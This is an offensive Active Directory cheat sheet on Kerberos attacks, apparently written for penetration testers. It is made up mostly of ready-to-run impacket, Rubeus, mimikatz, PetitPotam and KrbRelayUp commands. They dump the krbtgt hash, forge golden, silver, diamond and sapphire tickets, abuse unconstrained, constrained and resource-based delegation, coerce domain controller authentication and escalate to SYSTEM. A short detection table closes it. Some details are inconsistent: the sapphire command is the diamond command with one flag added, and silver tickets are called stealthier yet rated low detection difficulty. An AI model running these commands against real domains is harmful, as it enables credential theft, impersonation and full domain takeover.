Kerberos Attacks

Golden ticket, silver ticket, diamond ticket, sapphire ticket, delegation abuse, S4U, ticket forging, and Kerberos relay. Covers exploitation from both Linux and Windows.

Sections Kerberos Attacks

You have compromised credentials, hashes, or keys and want to abuse Kerberos for privilege escalation, persistence, or lateral movement. Kerberos is the default authentication protocol in AD, and its trust model creates powerful attack opportunities when you control the right secrets.

Kerberos Key Material Reference

Different attacks require different key material. Know what you need before you start.

Material Where to Get It Used For
krbtgt NTLM hash DCSync, NTDS.dit Golden Ticket
krbtgt AES256 key DCSync, NTDS.dit Diamond Ticket, Golden Ticket (stealth)
Service account NTLM hash Kerberoasting, DCSync, LSASS Silver Ticket
Service account AES256 key DCSync, LSASS Silver Ticket (stealth)
Machine account hash LSASS, secretsdump Silver Ticket, S4U
User TGT LSASS, Rubeus, getTGT Pass-the-Ticket, S4U
Domain SID whoami /all, PowerView, lookupsid All ticket forging

Golden Ticket

A Golden Ticket is a forged TGT signed with the krbtgt hash. Since every DC uses the krbtgt key to validate TGTs, a Golden Ticket gives you access as any user (including non-existent users) for as long as the krbtgt password is not rotated twice.

Get the krbtgt Hash 

# DCSync the krbtgt account
impacket-secretsdump corp.local/Administrator:'P@ssw0rd123'@10.10.11.35 -just-dc-user krbtgt

# Note the NTLM hash and AES256 key from the output

Forge the Golden Ticket 

# Impacket ticketer
impacket-ticketer -nthash 1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d -domain-sid S-1-5-21-3842939050-3880317879-2865463114 -domain corp.local Administrator
export KRB5CCNAME=Administrator.ccache

# Use the ticket
impacket-psexec corp.local/Administrator@dc01.corp.local -k -no-pass

# With AES256 key (stealthier)
impacket-ticketer -aesKey 4a3f2b1c5d6e7f8a9b0c1d2e3f4a5b6c7d8e9f0a1b2c3d4e5f6a7b8c9d0e1f2 -domain-sid S-1-5-21-3842939050-3880317879-2865463114 -domain corp.local Administrator
Golden Tickets bypass all password changes except krbtgt rotation. To invalidate Golden Tickets, the krbtgt password must be reset twice (because AD keeps the current and previous password). A single reset still leaves the old key valid.

Silver Ticket

A Silver Ticket is a forged TGS for a specific service. It is signed with the service account’s hash (or the machine account hash for services running as SYSTEM). The DC is never contacted, so Silver Tickets bypass most logging.

Forge a Silver Ticket 

# Silver Ticket for CIFS (file shares) on ws01
impacket-ticketer -nthash a3f1b9c2d4e5f6a7b8c9d0e1f2a3b4c5 -domain-sid S-1-5-21-3842939050-3880317879-2865463114 -domain corp.local -spn cifs/ws01.corp.local Administrator
export KRB5CCNAME=Administrator.ccache
impacket-smbclient corp.local/Administrator@ws01.corp.local -k -no-pass

# Silver Ticket for HTTP (WinRM) on dc01
impacket-ticketer -nthash a3f1b9c2d4e5f6a7b8c9d0e1f2a3b4c5 -domain-sid S-1-5-21-3842939050-3880317879-2865463114 -domain corp.local -spn http/dc01.corp.local Administrator
export KRB5CCNAME=Administrator.ccache
evil-winrm -i dc01.corp.local -r corp.local

# Silver Ticket for LDAP on dc01 (enables DCSync)
impacket-ticketer -nthash a3f1b9c2d4e5f6a7b8c9d0e1f2a3b4c5 -domain-sid S-1-5-21-3842939050-3880317879-2865463114 -domain corp.local -spn ldap/dc01.corp.local Administrator
export KRB5CCNAME=Administrator.ccache
impacket-secretsdump corp.local/Administrator@dc01.corp.local -k -no-pass -just-dc

Common SPN Targets for Silver Tickets

SPN Service What You Can Do
cifs/host SMB Access file shares, PsExec
host/host HOST Create services, scheduled tasks, WMI
http/host WinRM PowerShell Remoting
ldap/dc LDAP DCSync, LDAP queries
mssql/host MSSQL Database access
wsman/host WinRM Same as HTTP
Silver Tickets are stealthier than Golden Tickets because they never touch the DC. The TGS is validated locally by the target service. The downside is that they only work for the specific service and host you forged them for.

Diamond Ticket

A Diamond Ticket is a legitimate TGT requested from the DC, then modified (the PAC is decrypted with the krbtgt key, changed, and re-encrypted). Because the TGT was originally issued by the DC, it has valid metadata and is much harder to detect than a Golden Ticket.

powershell
# Rubeus diamond ticket
PS C:\> .\Rubeus.exe diamond /krbkey:4a3f2b1c5d6e7f8a9b0c1d2e3f4a5b6c7d8e9f0a1b2c3d4e5f6a7b8c9d0e1f2 /user:svc_backup /password:P@ssw0rd123 /enctype:aes /ticketuser:Administrator /domain:corp.local /dc:dc01.corp.local /ptt
Diamond Tickets require the krbtgt AES key and a valid domain account. The legitimate TGT request generates a normal AS-REQ/AS-REP exchange on the DC, making the initial request indistinguishable from normal traffic.

Sapphire Ticket

A Sapphire Ticket takes the Diamond Ticket concept further. Instead of modifying the PAC in a legitimate TGT, it requests a TGT, then uses S4U2Self to get a service ticket for a high-privileged user and transplants that PAC into the original TGT. The PAC is completely legitimate, not forged.

powershell
# Rubeus sapphire ticket
PS C:\> .\Rubeus.exe diamond /krbkey:4a3f2b1c5d6e7f8a9b0c1d2e3f4a5b6c7d8e9f0a1b2c3d4e5f6a7b8c9d0e1f2 /user:svc_backup /password:P@ssw0rd123 /enctype:aes /ticketuser:Administrator /domain:corp.local /dc:dc01.corp.local /ptt /tgtdeleg
Sapphire Tickets are the most OPSEC-safe ticket forging technique. The PAC is legitimate (obtained via S4U2Self from a real DC), and the TGT was legitimately requested. Detection requires deep Kerberos traffic analysis.

Delegation Abuse

Delegation allows services to act on behalf of users. Misconfigured delegation is one of the most common privilege escalation paths in AD.

Unconstrained Delegation

Machines with unconstrained delegation store the TGT of every user that authenticates to them. Compromise the machine, extract the TGTs, and impersonate those users.

terminal
# Find unconstrained delegation hosts (excluding DCs)
root@localhost:~# ldapsearch -x -H ldap://10.10.11.35 -D "svc_backup@corp.local" -w 'P@ssw0rd123' \
  -b "DC=corp,DC=local" "(&(objectClass=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288)(!(primaryGroupID=516)))" cn dNSHostName
powershell
# Monitor for incoming TGTs with Rubeus
PS C:\> .\Rubeus.exe monitor /interval:5 /nowrap

# Coerce DC authentication (PrinterBug)
PS C:\> .\SpoolSample.exe dc01.corp.local ws01.corp.local

# Extract the DC machine TGT from Rubeus output and inject it
PS C:\> .\Rubeus.exe ptt /ticket:doIFNjCCBTKgAwIB...

# DCSync with the DC's TGT
PS C:\> .\mimikatz.exe "lsadump::dcsync /domain:corp.local /user:krbtgt" "exit"
terminal
# Coerce from Linux (PetitPotam)
root@localhost:~# python3 PetitPotam.py ws01.corp.local dc01.corp.local

# Or PrinterBug
root@localhost:~# python3 printerbug.py corp.local/svc_backup:'P@ssw0rd123'@dc01.corp.local ws01.corp.local

Constrained Delegation (S4U)

Accounts with constrained delegation can impersonate any user to the services listed in msDS-AllowedToDelegateTo. If protocol transition is enabled (T2A4D), no user interaction is needed.

# Find constrained delegation
impacket-findDelegation corp.local/svc_backup:'P@ssw0rd123' -dc-ip 10.10.11.35

# S4U2Self + S4U2Proxy (impersonate Administrator to target service)
impacket-getST corp.local/svc_sql:'P@ssw0rd123' -spn cifs/ws01.corp.local -impersonate Administrator -dc-ip 10.10.11.35
export KRB5CCNAME=Administrator@cifs_ws01.corp.local@CORP.LOCAL.ccache
impacket-psexec corp.local/Administrator@ws01.corp.local -k -no-pass

# S4U with hash
impacket-getST corp.local/svc_sql -hashes :a3f1b9c2d4e5f6a7b8c9d0e1f2a3b4c5 -spn cifs/ws01.corp.local -impersonate Administrator -dc-ip 10.10.11.35

# Alternative SPN (service name is ignored in some cases)
impacket-getST corp.local/svc_sql:'P@ssw0rd123' -spn cifs/ws01.corp.local -impersonate Administrator -dc-ip 10.10.11.35 -altservice ldap/dc01.corp.local
The /altservice flag (Rubeus) or -altservice (Impacket) rewrites the SPN in the resulting ticket. The DC only validates the target host, not the service name. You can request a ticket for cifs/ws01 and change it to ldap/ws01 or host/ws01.

Resource-Based Constrained Delegation (RBCD)

RBCD is configured on the target, not the source. If you can write to msDS-AllowedToActOnBehalfOfOtherIdentity on a computer object, you can configure it to allow a machine account you control to impersonate any user to that target.

1

Add a Computer Account

“If ms-DS-MachineAccountQuota > 0, add a computer with impacket-addcomputer or PowerMad.”
2

Set RBCD

“Write your new computer’s SID to msDS-AllowedToActOnBehalfOfOtherIdentity on the target.”
3

S4U2Self + S4U2Proxy

“Use your computer account to perform S4U and get a ticket as Administrator to the target.”
4

Access the Target

“Use the forged ticket for PsExec, SMB, WinRM, or any other service on the target.”
terminal
# Step 1: Add a computer account
root@localhost:~# impacket-addcomputer corp.local/svc_backup:'P@ssw0rd123' -computer-name 'EVILPC$' -computer-pass 'Password123' -dc-ip 10.10.11.35

# Step 2: Set RBCD on the target
root@localhost:~# impacket-rbcd corp.local/svc_backup:'P@ssw0rd123' -dc-ip 10.10.11.35 -action write -delegate-from 'EVILPC$' -delegate-to 'ws01$'

# Step 3: S4U to get a ticket as Administrator
root@localhost:~# impacket-getST corp.local/'EVILPC$':'Password123' -spn cifs/ws01.corp.local -impersonate Administrator -dc-ip 10.10.11.35
export KRB5CCNAME=Administrator@cifs_ws01.corp.local@CORP.LOCAL.ccache

# Step 4: Access the target
root@localhost:~# impacket-psexec corp.local/Administrator@ws01.corp.local -k -no-pass

# Cleanup: remove RBCD config
root@localhost:~# impacket-rbcd corp.local/svc_backup:'P@ssw0rd123' -dc-ip 10.10.11.35 -action flush -delegate-to 'ws01$'

Kerberos Relay (KrbRelayUp)

KrbRelayUp abuses local Kerberos relay to escalate privileges on a domain-joined machine without needing any AD credentials. It relays the machine account’s Kerberos authentication to LDAP to set RBCD on itself.

powershell
# KrbRelayUp - local privilege escalation via Kerberos relay
PS C:\> .\KrbRelayUp.exe relay -Domain corp.local -CreateNewComputerAccount -ComputerName EVILPC$ -ComputerPassword Password123

# After RBCD is set, use Rubeus S4U
PS C:\> .\Rubeus.exe s4u /user:EVILPC$ /rc4:<hash_of_Password123> /impersonateuser:Administrator /msdsspn:host/ws01.corp.local /ptt

# Then create a service or use SCM for SYSTEM shell
PS C:\> .\KrbRelayUp.exe spawn -d corp.local -cn EVILPC$ -cp Password123
KrbRelayUp requires that LDAP signing is not enforced on the DC and that the machine can relay its own Kerberos authentication. This is the default configuration in most environments.

Ticket Management

Listing and Purging Tickets

powershell
# List current Kerberos tickets
PS C:\> klist

# Purge all tickets
PS C:\> klist purge

# Rubeus - list tickets in current session
PS C:\> .\Rubeus.exe triage

# Rubeus - dump all tickets from all sessions (requires SYSTEM)
PS C:\> .\Rubeus.exe dump /nowrap

# Rubeus - dump specific user's tickets
PS C:\> .\Rubeus.exe dump /user:Administrator /nowrap

Ticket Conversion

terminal
# Convert .kirbi (Windows) to .ccache (Linux)
root@localhost:~# impacket-ticketConverter ticket.kirbi ticket.ccache

# Convert .ccache to .kirbi
root@localhost:~# impacket-ticketConverter ticket.ccache ticket.kirbi

Requesting Tickets 

# Request TGT with password
impacket-getTGT corp.local/svc_backup:'P@ssw0rd123' -dc-ip 10.10.11.35

# Request TGT with NTLM hash
impacket-getTGT corp.local/svc_backup -hashes :a3f1b9c2d4e5f6a7b8c9d0e1f2a3b4c5 -dc-ip 10.10.11.35

# Request TGT with AES key
impacket-getTGT corp.local/svc_backup -aesKey 4a3f2b1c... -dc-ip 10.10.11.35

# Request a service ticket
impacket-getST corp.local/svc_backup:'P@ssw0rd123' -spn cifs/ws01.corp.local -dc-ip 10.10.11.35

Ticket Forging Detection Comparison

Ticket Type Requires Touches DC Detection Difficulty
Golden Ticket krbtgt hash Only on TGS-REQ Medium (PAC anomalies, no AS-REQ)
Silver Ticket Service account hash Never Low (no DC involvement)
Diamond Ticket krbtgt AES key + valid account AS-REQ + PAC modification High (legitimate TGT base)
Sapphire Ticket krbtgt AES key + valid account AS-REQ + S4U2Self Very High (legitimate PAC)